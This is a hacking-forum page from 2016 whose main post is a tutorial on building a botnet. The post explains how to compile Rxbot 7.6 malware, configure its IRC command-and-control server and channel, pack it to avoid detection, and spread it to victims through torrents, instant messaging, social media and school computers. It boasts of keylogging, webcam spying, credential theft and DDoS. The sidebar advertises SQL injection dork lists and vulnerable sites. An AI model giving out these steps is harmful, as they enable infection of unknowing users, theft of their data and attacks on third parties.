i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Private SQL Dorks [Daily Updates]
Yesterday at 2:49 am by Admin

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2016
Sun Oct 23, 2016 8:23 pm by Admin

» SQL Vulnerable Website
Sun Oct 23, 2016 5:04 pm by Admin

» YouTube Video Downloader (YTD) PRO
Fri Oct 21, 2016 7:02 pm by Admin

» PDF Decrypter Pro
Fri Oct 21, 2016 7:00 pm by Admin

» 2016 Dorks list
Thu Oct 20, 2016 5:49 pm by Admin

» PHP Mailer Script
Mon Oct 17, 2016 5:38 pm by Admin

» The Ultimate Interview Guide: 30 Prep Tips for Job Interview Success
Sun Oct 16, 2016 5:32 pm by Admin

» How to track who visited my Facebook profile?
Sun Oct 16, 2016 12:59 am by awarii

October 2016


Calendar Calendar


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter

Flag Counter

About Author

Muhammad Shahroze Rashid
Web Developer
Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Auditor, a keen Security researcher.
lahore, Punjab
[email protected]
DOB: 05/25/1992
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid is a Web Developer and Designer, Android Developer, InfoGrapher, IT consultant and Researcher
Reviewed by Google
Date published: 01/19/2016
9 / 10 stars
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Audito

Creating Your own bootnet | hack into any Computer



Posts : 438
Reputation : 3
Join date : 2014-12-10
Age : 24
Location : Pakistan

Creating Your own bootnet | hack into any Computer

Post by Admin on Wed May 13, 2015 5:41 pm

This tutorial uses mIRC and other tools, which you will need to download. You can find them via google or through pirating methods listed in the Misc Hacks section of this app.

Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a bot joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a zombie.
Depending on the source you used, the bot can do several things.
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC Takeovers.
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Anything is possible !

Theres the infected computers bots the attacker, the server, and the slave.

while the term botnet can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka bot herder) can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC bots. Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out low profile DDoS attacks and steal the CD keys for games, he explained. They had a huge weapon and didn't use as much as they could have done, Santorelli told El Reg. The main damage caused in the case is down to the cost of cleaning up infected PCs.

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.

Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Download and install the Service pack 6
Download and install Windows SDK
Open up Microsoft Visual C++ Compilier 6.0
Go to Tools > Options and Click the Directories tab
Now, browse to these directories and add them to the list: (Click the dotted box to add)

Make sure they're in the order above (use the arrows to adjust the order)
Download Rxbot 7.6
Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Put in quotations:
char password[] = Bot_login_pass; // bot password (Ex: monkey)
char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net)
char serverpass[] = ; // server password (not usually needed)
char channel[] = #botz_channel; // channel that the bot should join
char chanpass[] = My_channel_pass; // channel password

char server2[] = ; // backup server
char channel2[] = ; // backup channel
char chanpass2[] = ; //Backup channel pass
Make sure Microsoft Visual C++ is open
Select File > Open Workspace
Browse to your Rxbot 7.6 folder and open the rBot.dsw file
Right Click rBot Files and click Build:
rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click Protect and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

    Current date/time is Fri Oct 28, 2016 8:18 am